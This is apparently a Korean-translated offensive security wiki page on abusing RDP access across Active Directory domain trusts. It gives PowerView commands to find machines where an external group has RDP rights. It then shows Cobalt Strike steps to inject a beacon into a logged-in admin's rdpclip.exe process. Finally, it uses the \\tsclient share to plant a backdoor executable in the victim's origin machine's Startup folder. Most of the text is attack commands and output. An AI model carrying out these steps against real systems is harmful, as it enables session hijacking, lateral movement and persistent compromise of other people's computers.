외부 그룹이 현재 도메인의 어떤 컴퓨터에 RDP 접근 권한이 있다면, 공격자는 해당 컴퓨터를 손상시키고 그를 기다릴 수 있습니다.
해당 사용자가 RDP를 통해 접근하면, 공격자는 그 사용자의 세션으로 피벗할 수 있으며 외부 도메인에서 그 권한을 남용할 수 있습니다.
# Supposing the group "External Users" has RDP access in the current domain## lets find where they could access## The easiest way would be with bloodhound, but you could also run:Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#orFind-DomainLocalGroupMember-GroupName "Remote Desktop Users"| select -expand ComputerName# Then, compromise the listed machines, and wait til someone from the external domain logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> psPID PPID Name Arch Session User---------------------------...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local## From that beacon you can just run powerview modules interacting with the external domain as that user
Check other ways to steal sessions with other toolsin this page.
RDPInception
사용자가 RDP를 통해 머신에 접근할 때, 공격자가 그를 기다리고 있다면, 공격자는 사용자의 RDP 세션에 비콘을 주입할 수 있으며, 만약 희생자가 RDP를 통해 접근할 때 드라이브를 마운트했다면, 공격자는 그것에 접근할 수 있습니다.
이 경우, 희생자의원래 컴퓨터를 백도어를 시작 폴더에 작성하여 타락시킬 수 있습니다.
# Wait til someone logs in:net logonsLogged on users at \\localhost:EXT\super.admin# With cobalt strike you could just inject a beacon inside of the RDP processbeacon> psPID PPID Name Arch Session User---------------------------...49601012rdpclip.exe x64 3 EXT\super.adminbeacon> inject 4960 x64 tcp-local# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.## \\tsclient\c is the C: drive on the origin machine of the RDP sessionbeacon> ls \\tsclient\cSize Type Last Modified Name-------------------------dir 02/10/202104:11:30 $Recycle.Bindir 02/10/202103:23:44 Bootdir 02/20/202110:15:23 Config.Msidir 10/18/201601:59:39 Documents and Settings[...]# Upload backdoor to startup folderbeacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startupbeacon> upload C:\Payloads\pivot.exe